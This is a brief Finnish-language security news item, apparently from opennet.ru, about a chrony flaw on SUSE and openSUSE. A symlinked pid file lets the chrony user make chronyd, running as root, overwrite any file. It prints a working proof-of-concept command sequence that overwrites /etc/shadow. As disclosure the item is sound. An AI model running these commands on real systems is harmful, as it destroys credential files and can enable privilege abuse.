В
Haavoittuvuus johtuu pid-tiedoston vaarallisesta luomisesta, joka luotiin vaiheessa, jolloin chrony ei ollut vielä nollannut oikeuksia ja oli käynnissä pääkäyttäjänä. Tässä tapauksessa /run/chrony-hakemisto, johon pid-tiedosto on kirjoitettu, luotiin oikeuksilla 0750 systemd-tmpfilesin kautta tai kun chronyd käynnistettiin yhdessä käyttäjän ja ryhmän "chrony" kanssa. Siten, jos sinulla on pääsy käyttäjälle chrony, on mahdollista korvata pid-tiedosto /run/chrony/chronyd.pid symbolisella linkillä. Symbolinen linkki voi osoittaa mihin tahansa järjestelmätiedostoon, joka korvataan, kun chronyd käynnistetään.
root# systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ exit
root# /usr/sbin/chronyd -n
^C
# /etc/shadow sisällön sijaan tallennetaan chronyd-prosessitunnus
root# cat /etc/shadow
15287
Haavoittuvuus
SUSE- ja openSUSE-ongelma
Lähde: opennet.ru